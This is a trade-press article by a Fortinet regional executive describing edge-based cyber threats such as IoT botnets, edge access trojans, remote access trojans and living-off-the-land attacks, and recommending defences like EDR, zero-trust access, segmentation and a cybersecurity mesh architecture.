Cyber threats weaponizing the Edge

The traditional network perimeter has been replaced with multiple edge environments that include WAN, multi-cloud, data center, Internet of Things (IoT), and home and other remote workspaces. All of these edges are interconnected, which has improved performance, but often at the expense of centralized visibility and unified control. Each edge has unique risks that are offering new opportunities for cybercriminals to get a foothold. In fact, reports indicate that home networks used by remote workers are 3.5x more likely to have at least one family of malware, and 7.5x more likely to have five or more.

The lack of security on these networks means it's inevitable that more corporate network attacks will be launched from a remote worker network located at the edge.

Cyber Threats at the Edge

The rise in remote work is exposing corporate networks to threats that plague residential networks. Malware that affects IoT devices, like printers, have been prevalent in botnet attacks. If a botnet infects hundreds of thousands of devices, it can be used in distributed denial of service (DDoS) attacks. Using these small IoT devices is a widespread threat today and will evolve over time.

Although end-users and their home resources are already targets for cybercriminals, sophisticated attackers can use home-based resources as a springboard for other more serious attacks. Edge access trojans (EATs) can perform invasive activities such as intercept requests off the local network to compromise additional systems or inject additional attack commands. Along the same lines, a remote access trojan (RAT) is a type of malware that gives the attacker full control of a user’s computer. The cybercriminal maintains access to the device through a remote network connection, which they use to steal information or spy on a user.

When cybercriminals combine voice-enabled "smart" devices from a home network with a RAT, you end up with a trojan that is capable of collecting and listening to data, and then acting on it. What this means is that smart devices or other home-based systems that interact with users, will no longer simply be targets for attacks, but will also be conduits for deeper attacks. Cybercriminals can take advantage of important contextual information about users including daily routines, habits, or financial information to improve the success rate of their social engineering-based attacks. These smarter attacks could lead to much more than turning off security systems, disabling cameras, or hijacking smart appliances. They could enable the ransoming and extortion of additional data or stealth credential attacks.

Another edge-based "living off the land" threat allows malware to use existing toolsets and capabilities within compromised environments so attacks and data exfiltration look like normal system activity. Because nothing seems out of the ordinary and the attacker is using legitimate tools to carry out the nefarious activity, these types of attacks can be extremely effective. The combination of living off the land attacks with EATs is likely to mean new attacks will be designed to live off the edge, not just the land. As edge devices become more powerful with more native capabilities and more privilege, edge-based malware could monitor edge activities and data and then steal, hijack, or even ransom critical systems, applications and information while avoiding being detected.

Defending Against Cyber Threats at the Edge

As more of these edge attacks turn into a reality, it's only a matter of time before the malware is commoditized and available as a darknet service or as part of open-source toolkits. It will take a combination of technology, people, training, and partnerships to protect users from these types of attacks at the edge. Unfortunately, even as the network perimeter becomes more fragmented and more organizations transition to a multi-cloud or hybrid networking model, cybersecurity teams continue to operate in silos. As they add on more edges and cloud-based access into their networks, many organizations attempt to “bolt on” security tools to protect a given function or segment of the network in isolation. But doing so makes maintaining organization-wide visibility and consistent policy enforcement virtually impossible. As attacks become more sophisticated and complex, organizations struggling with security gaps are increasingly vulnerable.

Organizations need to take advantage of artificial intelligence (AI) and machine learning (ML) to speed threat prevention, detection, and response. Advanced endpoint technologies like endpoint detection and response (EDR) can help to identify malicious threats based on behaviour. Also, zero-trust network access (ZTNA) is critical for secure application access to extend protections to mobile workers and learners, while Secure SD-WAN is important to protect evolving WAN edges. Segmentation is another foundational strategy that can be used to restrict lateral movement inside a network and confine breaches to a smaller portion of the network. Actionable and integrated threat intelligence can improve an organization’s real-time defences as the speed of attacks continues to increase. Rather than trying to add on more products in each of these areas, a better approach is to use a cybersecurity mesh architecture that integrates security controls into, and across, widely distributed networks and assets. 

The author is Regional Vice President - India & SAARC, Fortinet